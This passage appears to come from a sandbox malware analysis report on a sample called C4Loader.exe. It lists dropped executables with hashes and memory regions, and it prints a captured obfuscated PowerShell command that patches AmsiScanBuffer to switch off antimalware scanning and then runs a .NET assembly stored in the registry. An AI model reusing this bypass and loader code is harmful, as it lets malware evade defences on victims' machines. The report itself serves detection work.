har](116)+'')));$gzFEkOI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bcTYqBfQqPuDDJ,$hPwTQzyZHTUemWpXfpr).Invoke('ams'+'i'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$BWLqHLYKEseKIOEOA=$JHYrFqSKiGCkbg.Invoke($Null,@([Object]$gzFEkOI,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+'f'+[Char](101)+''+'r'+'')));$cRcvilIHtI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mOVKLcrQlQOhzWsAv,$TsFQsekblSBnRuFOhrywDr).Invoke($BWLqHLYKEseKIOEOA,[uint32]8,4,[ref]$cRcvilIHtI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BWLqHLYKEseKIOEOA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mOVKLcrQlQOhzWsAv,$TsFQsekblSBnRuFOhrywDr).Invoke($BWLqHLYKEseKIOEOA,[uint32]8,0x20,[ref]$cRcvilIHtI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OFTW'+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'d'+''+'i'+''+[Char](97)+'le'+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{fcf0e698-f5b9-4a35-8f7c-433f51a62e26}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
28KB
MD539924b7dcecec33d208224b7df8e78f0
SHA112d9189b6bf68e9ffd8e393a5ab7a66fd9c02db5
SHA256bdb86940389898e4feebf16c139b864aad8b1135838df6bb8c23d4871bab1d69
SHA512dfd3e4681b9bc07d8a6e5a7deb0641b738edf96e78c14cf60ca3052f260c9c47cd1ee7c8ad2cd973de026e5cb5d5eb00bd14a4eeab3c6e629d275056c66f2bee
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
28KB
MD539924b7dcecec33d208224b7df8e78f0
SHA112d9189b6bf68e9ffd8e393a5ab7a66fd9c02db5
SHA256bdb86940389898e4feebf16c139b864aad8b1135838df6bb8c23d4871bab1d69
SHA512dfd3e4681b9bc07d8a6e5a7deb0641b738edf96e78c14cf60ca3052f260c9c47cd1ee7c8ad2cd973de026e5cb5d5eb00bd14a4eeab3c6e629d275056c66f2bee
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD5124edf3ad57549a6e475f3bc4e6cfe51
SHA180f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
19KB
MD5851e5e6ac1908dfc3678c207428f5ff8
SHA19449ee859db67dc092fd0a12250034d93a87d648
SHA25692c4e1f58b5e35e51908dd00b2fe4fa46e18315fd4fce65faf554d9842602ea9
SHA51223b34cec921f01a9e895c5af8c6c683a2a13ab957c4325b11f9ddaa1e4df417dad388367f45a5e409569017193a6f42ece54efe462164868b6ee03fa34631c94
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5c697637a9b17f577fccd7e83a5495810
SHA104e6054584786b88994b0e0a871562227fe2a435
SHA25654992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164
SHA51266f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
C:\Users\Admin\AppData\Local\Temp\RzLNTXYeUCWKsXbGyRAOmBTvKSJfjzaLFilesize
2KB
MD5dce9b749d38fdc247ab517e8a76e6102
SHA1d6c5b6548e1a3da3326bd097c50c49fc7906be3f
SHA2565087b8c7f2cecceac61d7bd02b939888cf2cc5a452676f28fd5c076eb1ae7ea7
SHA51256c276f0a070da656c98520aa720994d78f1bf0bbb085a5f6fb4fd18fed2bbba1eb8e97b54d58eaa9a978d21d64678170f49c020feb19d8545d158a2d8d58446
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tioncbhx.u1z.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\nJObCsNVlgTeMaPEZQleQYhYzRyWJjPjFilesize
71KB
MD592d24961d2ebaacf1ace5463dfc9930d
SHA199ffaf6904ab616c33a37ce01d383e4a493df335
SHA2569013688dec264c615178e151c2eb5f0b2eb9fe8cfad867b311d8581d921c73f3
SHA51277598c77f219ab5234b8b84bcfe873f40e7464b224fac3c8568b300d3f2563f7ef5ad9ec5cccc0d719e7d3e489a164b04b6b36316196afea0b8051de3c751cc7
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
C:\Users\Admin\Desktop\C4Loader.exeFilesize
687.8MB
MD566a41bcddbef0ad226adda334fc38ae6
SHA13128d77a2d71d1fc520d302f2d6a12f0c3c47a09
SHA25636f02f949c036b047e57b6319d246805a710ad119850988c70b7de96b139658a
SHA512541fcd5bf78329a2ccf2ad722b63bcc749bc357911bcd1a15748774a054713096906835245486e85a4766a6960a4da0cb203cdf22e0a37471745c1a4d17b5dea
-
C:\Users\Admin\Desktop\C4Loader.exeFilesize
687.8MB
MD566a41bcddbef0ad226adda334fc38ae6
SHA13128d77a2d71d1fc520d302f2d6a12f0c3c47a09
SHA25636f02f949c036b047e57b6319d246805a710ad119850988c70b7de96b139658a
SHA512541fcd5bf78329a2ccf2ad722b63bcc749bc357911bcd1a15748774a054713096906835245486e85a4766a6960a4da0cb203cdf22e0a37471745c1a4d17b5dea
-
memory/60-392-0x0000028CE4250000-0x0000028CE4260000-memory.dmpFilesize
64KB
-
memory/60-393-0x0000028CE4250000-0x0000028CE4260000-memory.dmpFilesize
64KB
-
memory/60-395-0x0000028CE4250000-0x0000028CE4260000-memory.dmpFilesize
64KB
-
memory/60-397-0x00007FFA99030000-0x00007FFA99225000-memory.dmpFilesize
2.0MB
-
memory/60-398-0x00007FFA97080000-0x00007FFA9713E000-memory.dmpFilesize
760KB
-
memory/432-241-0x0000000005380000-0x000000000538A000-memory.dmpFilesize
40KB
-
memory/432-247-0x00000000050D0000-0x00000000050E0000-memory.dmpFilesize
64KB
-
memory/432-245-0x00000000050D0000-0x00000000050E0000-memory.dmpFilesize
64KB
-
memory/432-237-0x0000000004F90000-0x0000000005022000-memory.dmpFilesize
584KB
-
memory/432-229-0x0000000000540000-0x00000000006AC000-memory.dmpFilesize
1.4MB
-
memory/432-263-0x00000000050D0000-0x00000000050E0000-memory.dmpFilesize
64KB
-
memory/1120-356-0x00007FF614E80000-0x00007FF615240000-memory.dmpFilesize
3.8MB
-
memory/1120-372-0x00007FF614E80000-0x00007FF615240000-memory.dmpFilesize
3.8MB
-
memory/1120-262-0x00007FF614E80000-0x00007FF615240000-memory.dmpFilesize
3.8MB
-
memory/1144-365-0x000001C26B290000-0x000001C26B2A0000-memory.dmpFilesize
64KB
-
memory/1144-359-0x000001C26B290000-0x000001C26B2A0000-memory.dmpFilesize
64KB
-
memory/1144-357-0x000001C26B290000-0x000001C26B2A0000-memory.dmpFilesize
64KB
-
memory/1144-358-0x000001C26B290000-0x000001C26B2A0000-memory.dmpFilesize
64KB
-
memory/1144-360-0x00007FF46C4F0000-0x00007FF46C500000-memory.dmpFilesize
64KB
-
memory/1144-364-0x000001C26B290000-0x000001C26B2A0000-memory.dmpFilesize
64KB
-
memory/1144-367-0x000001C26A7C0000-0x000001C26B281000-memory.dmpFilesize
10.8MB
-
memory/2412-175-0x0000000006850000-0x0000000006882000-memory.dmpFilesize
200KB
-
memory/2412-195-0x0000000004F80000-0x0000000004F90000-memory.dmpFilesize
64KB
-
memory/2412-174-0x0000000004F80000-0x0000000004F90000-memory.dmpFilesize
64KB
-
memory/2412-176-0x0000000074920000-0x000000007496C000-memory.dmpFilesize
304KB
-
memory/2412-186-0x0000000006820000-0x000000000683E000-memory.dmpFilesize
120KB
-
memory/2412-173-0x0000000004F80000-0x0000000004F90000-memory.dmpFilesize
64KB
-
memory/2412-187-0x000000007FA80000-0x000000007FA90000-memory.dmpFilesize
64KB
-
memory/2412-188-0x0000000007BE0000-0x000000000825A000-memory.dmpFilesize
6.5MB
-
memory/2412-155-0x0000000002CC0000-0x0000000002CF6000-memory.dmpFilesize
216KB
-
memory/2412-172-0x0000000004F80000-0x0000000004F90000-memory.dmpFilesize
64KB
-
memory/2412-171-0x0000000005540000-0x000000000555E000-memory.dmpFilesize
120KB
-
memory/2412-156-0x00000000055C0000-0x0000000005BE8000-memory.dmpFilesize
6.2MB
-
memory/2412-157-0x0000000004F80000-0x0000000004F90000-memory.dmpFilesize
64KB
-
memory/2412-159-0x00000000052D0000-0x00000000052F2000-memory.dmpFilesize
136KB
-
memory/2412-196-0x0000000007930000-0x0000000007952000-memory.dmpFilesize
136KB
-
memory/2412-158-0x0000000004F80000-0x0000000004F90000-memory.dmpFilesize
64KB
-
memory/2412-197-0x000000007FA80000-0x000000007FA90000-memory.dmpFilesize
64KB
-
memory/2412-161-0x0000000005C60000-0x0000000005CC6000-memory.dmpFilesize
408KB
-
memory/2412-198-0x0000000008810000-0x0000000008DB4000-memory.dmpFilesize
5.6MB
-
memory/2412-194-0x0000000007810000-0x0000000007818000-memory.dmpFilesize
32KB
-
memory/2412-193-0x0000000007820000-0x000000000783A000-memory.dmpFilesize
104KB
-
memory/2412-192-0x00000000077D0000-0x00000000077DE000-memory.dmpFilesize
56KB
-
memory/2412-191-0x0000000007840000-0x00000000078D6000-memory.dmpFilesize
600KB
-
memory/2412-190-0x0000000007610000-0x000000000761A000-memory.dmpFilesize
40KB
-
memory/2412-189-0x00000000075A0000-0x00000000075BA000-memory.dmpFilesize
104KB
-
memory/2412-160-0x0000000005BF0000-0x0000000005C56000-memory.dmpFilesize
408KB
-
memory/2696-373-0x00007FF6E2D40000-0x00007FF6E2D69000-memory.dmpFilesize
164KB
-
memory/3208-148-0x0000000000400000-0x000000000040F000-memory.dmpFilesize
60KB
-
memory/3208-154-0x0000000000400000-0x000000000040F000-memory.dmpFilesize
60KB
-
memory/3572-394-0x0000000003A80000-0x0000000003A90000-memory.dmpFilesize
64KB
-
memory/3572-396-0x0000000003A80000-0x0000000003A90000-memory.dmpFilesize
64KB
-
memory/3668-320-0x000001A33EC80000-0x000001A33EC9A000-memory.dmpFilesize
104KB
-
memory/3668-321-0x000001A33EC30000-0x000001A33EC38000-memory.dmpFilesize
32KB
-
memory/3668-319-0x000001A33EC20000-0x000001A33EC2A000-memory.dmpFilesize
40KB
-
memory/3668-304-0x000001A33EC40000-0x000001A33EC5C000-memory.dmpFilesize
112KB
-
memory/3668-303-0x000001A33EC10000-0x000001A33EC1A000-memory.dmpFilesize
40KB
-
memory/3668-302-0x000001A33EBF0000-0x000001A33EC0C000-memory.dmpFilesize
112KB
-
memory/3668-285-0x000001A33E9C0000-0x000001A33E9D0000-memory.dmpFilesize
64KB
-
memory/3668-284-0x000001A33E9C0000-0x000001A33E9D0000-memory.dmpFilesize
64KB
-
memory/3668-283-0x000001A33E9C0000-0x000001A33E9D0000-memory.dmpFilesize
64KB
-
memory/3668-327-0x000001A33E9C0000-0x000001A33E9D0000-memory.dmpFilesize
64KB
-
memory/3668-271-0x000001A33EA70000-0x000001A33EA92000-memory.dmpFilesize
136KB
-
memory/3668-322-0x000001A33EC60000-0x000001A33EC66000-memory.dmpFilesize
24KB
-
memory/3668-323-0x000001A33EC70000-0x000001A33EC7A000-memory.dmpFilesize
40KB
-
memory/3668-326-0x000001A3258E0000-0x000001A3263A1000-memory.dmpFilesize
10.8MB
-
memory/5048-399-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/5048-403-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/5048-406-0x00007FFA99030000-0x00007FFA99225000-memory.dmpFilesize
2.0MB
-
memory/5048-407-0x00007FFA97080000-0x00007FFA9713E000-memory.dmpFilesize
760KB
-
memory/5048-408-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB